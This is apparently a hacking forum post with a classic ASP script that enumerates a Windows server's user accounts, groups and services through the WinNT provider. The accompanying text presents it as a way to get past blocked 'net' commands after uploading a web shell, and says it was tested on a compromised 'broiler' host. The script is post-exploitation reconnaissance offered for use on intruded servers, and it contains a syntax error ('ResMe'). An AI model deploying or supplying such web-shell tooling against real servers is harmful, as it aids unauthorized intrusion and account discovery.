// CopyRight 32768 2004
<%
DIM OBJ
ON Error ResMe next
For Each Obj IN GetObject ("WinNT: //.")
Err.Clear%>
->
<% if Err THEN
%> System User (Group) <% ELSE%> System Process <% END IF%>
<% = Obj.name%>
<% if Err THEN
Else
%> (<% = obj.displayName%>) <% end if%>
<% = Obj.path%>
<%
NEXT
%>
Sometimes the server has a safe configuration but does not do it. After the CMD is uploaded, it is still unable to execute the net command, and this usually can break through. I did test on the HACK520 broiler, it was indeed useful, released last year.